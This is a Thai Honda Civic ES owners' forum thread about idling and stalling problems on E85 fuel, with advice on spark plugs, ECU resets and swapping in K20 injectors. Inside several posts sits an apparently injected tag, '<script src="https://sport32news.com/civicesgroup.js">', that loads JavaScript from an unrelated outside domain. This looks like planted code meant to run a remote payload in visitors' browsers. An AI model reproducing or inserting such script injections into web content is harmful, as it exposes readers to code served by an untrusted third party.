จากนั้นให้ตรวจสอบระบบไฟจุดระเบิด ว่ามีไฟไปจ่ายให่กับหัวเทียนสมบูรณ์?หรือไม่ อาจจะมีสายหัวเทียนเกิดความต้านทานเพิ่มขึ้น ทำให้เกิดโวลเต็จดร๊อปในสาย ให้ไฟไฟสูงที่จ่ายให้กับหัวเทียนต่ำลง และลองเปลี่ยนหัวเทียนด้วย เพราะหลายๆท่านยังไม่ทราบว่าใส้ของหัวเทียนที่เป็นโลหะผสม ที่ให้กระแสไฟโวลเต็จสูงผ่าน เมื่อมีการใช้งานไปก็จะเกิดค่าความต้านทานเพิ่มขึ้นเช่นเดียวกับสายหัวเทียน และถ้าหากเกิดค่าความต้านทานเพิ่มขึ้นมาก จะทำให้ไฟที่เกิดประกายที่เขี้ยวหัวเทียน มีน้อย ทำให้การจุดระเบิดไม่สมบูรณ์ เครื่องยนต์กำลังตก ลองตรวจสอบวัดค่าความต้านทานระหว่างหัวเทียนใหม่กับหัวเทียนเก่าที่ใช้แล้วดูก็ได้ ก็ลองไปตรวจสอบหลักๆตามที่ผมกล่าวดูครับ ก็อาจทำให้ท่านเจ้าของกระทู้กลับมาใช้น้ำมัน E85 ได้เช่นเดียวกับพื่อน

ขอกล่าวเพิ่มเติมอีกหน่อย ทราบว่ามีท่านผู้รู้บอกว่าสำหรับรถ ES ในบางรุ่น ตั้งแต่ปี 04 ขึ้นไป ECU ของเครื่องยนต์ สามารถ Cover การปรับคาบเวลาเพิ่มขึ้นให้กับหัวฉีดได้ แต่ไม่สมบูรณ์ จริงเท็จประการใด ผมก็ยังไม่ได้ทดสอบการทำงานด้วยเครื่องมืออีเลคโทรนิคส์ ว่าเป็นจริงหรือไม่ โดยการวัดค่าคาบเวลาของสัญญาณพัลส์หัวฉีด ว่าเครื่องยนต์ที่ติดตั้งชุดคิท E85 ในรุ่นปีดังกล่าว ว่าการใช้และไม่ใช่ชุดคิท E85 มีค่าคาบเวลาของการเปิดหัวฉีดเท่ากันหรือไม่ หากเท่ากันก็แสดงว่ารถรุ่นนั้นมีกล่อง ECU ที่สามารถใช้กับน้ำมัน E85ได้ ส่วนที่จะสมบูรณ์แค่ไหนอย่างไรก็ต้อง ไปตรวจสอบเทียบเคียงกับรถที่ผลิดออกมาใช้กับน้ำมัน E85 ดู ว่ามีส่วนต่างๆอะไรบ้าง แต่ทราบในเบื้อต้นว่า มีส่วนที่แตกต่างหลายอย่าง .....srithanon

 

ชอบพี่คนนี้มากข้อมูลแน่นตลอด ขอบคุณแทนเพื่อนสมาชิกสำหรับข้อมูลดีๆ คับ
ได้รับคำขอบคุณจาก: bondza  tokykung 
bondza


ชื่อเล่น: ภานุวัฒน์

เข้าร่วม: 27 ตุลา 2013
ตอบ: 76

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 44
ให้คำขอบคุณ: 273

ที่อยู่: นครนายก ชลบุรี กรุงเทพ
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 9 ตุลา 2014 22:00 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
จิงๆแล้วecuเราสามารถแก้ไขตามที่พี่ข้างบ่นบอกได้นะคับแต่ไม่ค่อยมีใครทำให้เนื่องจากคนที่รู้ก็จะทำกล่องหลอกสัญญาคับจบ
bbb@es


เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

ที่อยู่: ดอนเมือง-รังสิตคับ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 10 ตุลา 2014 04:29 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
bondza พิมพ์ว่า:
จิงๆแล้วecuเราสามารถแก้ไขตามที่พี่ข้างบ่นบอกได้นะคับแต่ไม่ค่อยมีใครทำให้เนื่องจากคนที่รู้ก็จะทำกล่องหลอกสัญญาคับจบ


ecuเดิมของesนี่สามารถไปปรับอะไรมันได้ด้วยหรอคับผมหมายถึงเอากล่องเดิมๆมาปรับนะครับขอความรู้หน่อยคับว่าทำยังไงอยากรู้คับ
ได้รับคำขอบคุณจาก: bondza  ekdanai  tokykung 
bondza


ชื่อเล่น: ภานุวัฒน์

เข้าร่วม: 27 ตุลา 2013
ตอบ: 76

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 44
ให้คำขอบคุณ: 273

ที่อยู่: นครนายก ชลบุรี กรุงเทพ
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 12 ตุลา 2014 12:03 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ปรับค่าของคราบเวลาต่างๆของเครื่องคับพี่เขาเอาผมแค่60บาทแล้วก็บอกจิงๆแล้วไม่อยากทำให้เพราะจะทำให้พี่คนที่คิดกล่องเสริมมาขายไม่ได้คับ
Belly_Bell


ชื่อเล่น: น้องเบลล์

เข้าร่วม: 28 กันยา 2012
ตอบ: 923

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1108
ให้คำขอบคุณ: 201

ที่อยู่: กรุงเทพ-ปริมณพล
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 15 ตุลา 2014 11:34 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
เติม E85 เพียวๆเลย ใช้มาหลายเดือนแล้ว ไม่มีอาการตามนี้เลย ผลข้างเคียงแค่สตาร์ทติดช้ากว่านิดหน่อยในครั้งแรกที่ใช้รถในแต่ละวัน

อาการอื่นยังไม่มีให้เห็นนะคะ ลองๆดูค่ะ ^^
ได้รับคำขอบคุณจาก: วุฒิชัย  kaison 
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 15 ตุลา 2014 20:40 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
Belly_Bell พิมพ์ว่า:
เติม E85 เพียวๆเลย ใช้มาหลายเดือนแล้ว ไม่มีอาการตามนี้เลย ผลข้างเคียงแค่สตาร์ทติดช้ากว่านิดหน่อยในครั้งแรกที่ใช้รถในแต่ละวัน

อาการอื่นยังไม่มีให้เห็นนะคะ ลองๆดูค่ะ ^^


 เป็นแค่นี้เหมือนกันครับ  นอกนั้นปกติ
aunja


ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

ที่อยู่: อยุธยา บุรีรัมย์ ชัยภูมิ
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 16 ตุลา 2014 04:29 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ลองถอดแบตขั่วลบออก ทิ้งไว้5นาทีใส่กลับ เสียบกุญแจบิดไปตำแหน่ง on เหยียบคันเร่งค้างไว้สัก10วิ
จากนั้นเหยียบเบรค10วิเช่นกัน บิดกุญแจตำแหน่ง off แล้วสตาร์ดเครื่องอีกทีครับ
นี่คือวิธี รีเซ็ต ecu ผมลองทำแล้วหายนะครับ ถ้าไม่ดีขึ้นรอผู้รู้อีกทีครับ
ได้รับคำขอบคุณจาก: kaison 
ekdanai


ชื่อเล่น: ช้าง

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 2062

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1977
ให้คำขอบคุณ: 1004

ที่อยู่: อ.เมือง จ.พิษณุโลก
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พฤหัส, 16 ตุลา 2014 19:27 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
เมื่อก่อนผมก็มีอาการเหมือนเจ้าของกระทู้ครับ จึงหันมาใช้กล่อง e85 ดีขึ้นครับแต่พังไป 2 กล่องแล้ว
จึงหันมาคบกับหัวฉีด k20 9 ฝอย วิ่งเนียนๆเลยครับ หาข้อมูลในหน้า diy.เลยครับ
เครื่อง exi d17 z1 ครับ


Attached File :
เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
Attached File :
เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ได้รับคำขอบคุณจาก: Pondlimitless  Nung_Sodapop 
keawza


เข้าร่วม: 10 ธันวา 2009
ตอบ: 299

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 154
ให้คำขอบคุณ: 0

ที่อยู่: มีนบุรี ซอยมิสทีนคาป
ปี: 2001
ศุกร์, 17 ตุลา 2014 19:29 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
หาร้านเปลื่ยนหัวฉ๊ดเป็นk20 9รู จบเลยคับ 
ได้รับคำขอบคุณจาก: Pondlimitless  ekdanai 
numxs


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 ตุลา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1427
ให้คำขอบคุณ: 1715

ที่อยู่: สระบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 17 ตุลา 2014 22:23 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ลอง เช็ค code ดูก่อนมั้ยครับว่าเป็นอะไรแน่
ผมใช้e85 ไม่เคยเป็นนะครับ
ได้รับคำขอบคุณจาก: Pondlimitless 
Pondlimitless


เข้าร่วม: 22 สิงหา 2014
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 63
ให้คำขอบคุณ: 39

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 18 ตุลา 2014 10:48 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
numxs พิมพ์ว่า:
ลอง เช็ค code ดูก่อนมั้ยครับว่าเป็นอะไรแน่
ผมใช้e85 ไม่เคยเป็นนะครับ


พอผมเติม 91 หายเลยครับ อาการที่ว่ามาหายไปเลย แล้วตอนนี้ลองเติมผสมไปก่อนแล้วเปลี่ยนเป็น e20 เพียวๆ แล้วผสมกับ e85 ตอนนี้ e85 เพียวๆ อาการที่ว่ามาหายครับ
Pondlimitless


เข้าร่วม: 22 สิงหา 2014
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 63
ให้คำขอบคุณ: 39

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 18 ตุลา 2014 10:49 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
keawza พิมพ์ว่า:
หาร้านเปลื่ยนหัวฉ๊ดเป็นk20 9รู จบเลยคับ 


อยู่ในความคิดอยู่ครับ  
aon3160


ชื่อเล่น: อ้น

เข้าร่วม: 28 มีนา 2012
ตอบ: 222

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 236
ให้คำขอบคุณ: 97

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 18 ตุลา 2014 20:02 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
แต่ก่อน ก็เป็นแบบ เจ้าของกระทู้  ต้องใช้ไปสักพักถึงจะหายขาด ให้ ECU มันชิน E85  ก่อน(ปัจจุบันใช้ 2 ปีกว่าแล้ว ไม่มีปัญหาเบาดับ แต่ผม Exi Auto 02 เดิม ๆ) มันต้อง Reset ECU ใหม่ ตรวจเช็คทำความสะอาดลิ้นปีกผีเสื้อ, ไฟแบต แต่ผมตั้งสายคันเร่ง คลายน็อต ตรึงหน่อย สัก  1100 รอบ แต่เวลาเปิดแอร์ ECU ก็ปรับ Reset มาเหลือประมาณ 770 เรื่องไฟเอ็นจิ้น โชว์ หายขาด, รถติดไม่มีเบาดับ 
ได้รับคำขอบคุณจาก: Pondlimitless 
narurthep


ชื่อเล่น: ต้น

เข้าร่วม: 31 ตุลา 2013
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 51
ให้คำขอบคุณ: 1

ที่อยู่: 90 หมู่1 ต.บางรักพัฒนา อ.บางบัวทอง จ.นนทบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 18 ตุลา 2014 20:10 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ผมเติม e85 เพียวๆ เต็มถังครับ อาการสตารท์ตอนเครื่องเย็น ก้อปกติครับ อัดตราเร่ง ดีครับ แต่ไม่แน่ใจเรื่องสายน้ำมันจะมีปัญหาไหม ผมเปลี่ยนแค่หัวเทียนเปนแบบแพทตินั้ม อย่างเดียวใช้ไปนานจะมีผลหรือเปล่าครับ?? (รอผู้รู้มาตอบข้อข้องใจด้วยครับ)
Pondlimitless


เข้าร่วม: 22 สิงหา 2014
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 63
ให้คำขอบคุณ: 39

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 19 ตุลา 2014 23:15 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ekdanai พิมพ์ว่า:
เมื่อก่อนผมก็มีอาการเหมือนเจ้าของกระทู้ครับ จึงหันมาใช้กล่อง e85 ดีขึ้นครับแต่พังไป 2 กล่องแล้ว
จึงหันมาคบกับหัวฉีด k20 9 ฝอย วิ่งเนียนๆเลยครับ หาข้อมูลในหน้า diy.เลยครับ
เครื่อง exi d17 z1 ครับ



 

หัวฉีด k20 นี่ต้องแปลงเยอะมั้ยครับ หรือใส่ได้เลย
indica999


เข้าร่วม: 02 สิงหา 2013
ตอบ: 286

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 569
ให้คำขอบคุณ: 190
จันทร์, 20 ตุลา 2014 04:27 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
Pondlimitless พิมพ์ว่า:
ekdanai พิมพ์ว่า:
เมื่อก่อนผมก็มีอาการเหมือนเจ้าของกระทู้ครับ จึงหันมาใช้กล่อง e85 ดีขึ้นครับแต่พังไป 2 กล่องแล้ว
จึงหันมาคบกับหัวฉีด k20 9 ฝอย วิ่งเนียนๆเลยครับ หาข้อมูลในหน้า diy.เลยครับ
เครื่อง exi d17 z1 ครับ



 



หัวฉีด k20 นี่ต้องแปลงเยอะมั้ยครับ หรือใส่ได้เลย


แปลงน็อตยึดรางหัวฉีดเบอร์ 10 สองตัวให้ยาวขึ้น เสริมความหนา ที่จุดยึดขึ้นมาประมาณ 1.25นิ้ว ครับ เพราะหัวฉีด K จะยาวกว่า

"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Pondlimitless 
Pondlimitless


เข้าร่วม: 22 สิงหา 2014
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 63
ให้คำขอบคุณ: 39

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 20 ตุลา 2014 08:04 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
indica999 พิมพ์ว่า:
Pondlimitless พิมพ์ว่า:
ekdanai พิมพ์ว่า:
เมื่อก่อนผมก็มีอาการเหมือนเจ้าของกระทู้ครับ จึงหันมาใช้กล่อง e85 ดีขึ้นครับแต่พังไป 2 กล่องแล้ว
จึงหันมาคบกับหัวฉีด k20 9 ฝอย วิ่งเนียนๆเลยครับ หาข้อมูลในหน้า diy.เลยครับ
เครื่อง exi d17 z1 ครับ



 



หัวฉีด k20 นี่ต้องแปลงเยอะมั้ยครับ หรือใส่ได้เลย


แปลงน็อตยึดรางหัวฉีดเบอร์ 10 สองตัวให้ยาวขึ้น เสริมความหนา ที่จุดยึดขึ้นมาประมาณ 1.25นิ้ว ครับ เพราะหัวฉีด K จะยาวกว่า

"<script src="https://sport32news.com/civicesgroup.js">




สายไฟไม่ต้องแปลงใช่มั้ยครับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
pai_ana


เข้าร่วม: 24 สิงหา 2011
ตอบ: 283

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 211
ให้คำขอบคุณ: 93

ที่อยู่: พัทยา-ชลบุรี
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 20 ตุลา 2014 10:21 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ลองศึกษากระทู้ในตำนานดูครับ http://www.civicesgroup.com/forum/topic39293
petongzaa


ชื่อเล่น: เปตอง

เข้าร่วม: 20 ธันวา 2011
ตอบ: 660

Guru ES
Guru ES

ได้รับคำขอบคุณ: 616
ให้คำขอบคุณ: 718

ที่อยู่: นิคมขุนทะเล อ.เมือง สฎ
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 20 ตุลา 2014 11:11 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ใช้มา 2 ปี แล้วไม่มีปัญหาอะไรเลยครับ
saimai31


เข้าร่วม: 28 สิงหา 2014
ตอบ: 4

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
ให้คำขอบคุณ: 0
จันทร์, 20 ตุลา 2014 14:03 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
เปลี่ยนไปใส่หัวฉีด K20 9 รูครับเพราะ E85 ค่าออกเทนต่ำกว่าเครื่องยนต์ต้องการปริมาณน้ำมันเพิ่มขึ้นคับ..ถ้าผิดขออภัยหาขอมูลมาสักพักแล้วคับ...
ได้รับคำขอบคุณจาก: kaison 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.